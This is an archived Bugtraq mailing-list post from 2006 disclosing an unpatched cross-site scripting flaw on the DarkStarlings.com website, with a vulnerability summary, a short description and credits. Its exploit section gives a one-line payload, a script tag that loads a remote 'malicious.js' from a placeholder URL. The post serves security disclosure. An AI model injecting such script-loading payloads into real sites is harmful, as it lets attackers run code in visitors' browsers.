DarkStarlings.com XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DarkStarlings.com XSS Vulnerability
From: Will Boyce <mail@xxxxxxxxxxxxx>
Date: Mon, 6 Feb 2006 01:10:27 +0000
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:sender:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=pO953WRGSsWJpDuRVNfb6XVY9LCJMExXqiw0ZY2wImzeHXfgmGMPSiq2q7nVhzw81c73807CBJ0jOs1ZturxtM1FxfsgMBehiPX5FYvYdXqKAVx7rChKWxtWI34NYfkgOz1vW3Co2N/fteYdP9mMKMZ4T9Cd8ayDUyt1zEELnQs=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: Will Boyce <mail@xxxxxxxxxxxxx>
Sender: wrboyce@xxxxxxxxx

--------------------Summary----------------
Vendor: DarkStarlings
Vendor's Web Site: http://www.darkstarlings.com/
Software: All products
Versions: All versions
Critical Level: Moderate
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Will Boyce (mail@xxxxxxxxxxxxx)

-----------------Description---------------
Arbitrary script code insertion is possible in <script> tags
<script> tag isn't properly sanitized. This can be used to post
arbitrary script code.

--------------Exploit----------------------
<script language="text/javascript" src="http://url/malicious.js";>

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: Will Boyce (mail@xxxxxxxxxxxxx)
--
Regards, Will Boyce.
http://willboyce.com

Prev by Date: [ GLSA 200602-01 ] GStreamer FFmpeg plugin: Heap-based buffer overflow
Next by Date: [SECURITY] [DSA 965-1] New ipsec-tools packages fix denial of service
Previous by thread: [ GLSA 200602-01 ] GStreamer FFmpeg plugin: Heap-based buffer overflow
Next by thread: Re: DarkStarlings.com XSS Vulnerability
Index(es):
- Date
- Thread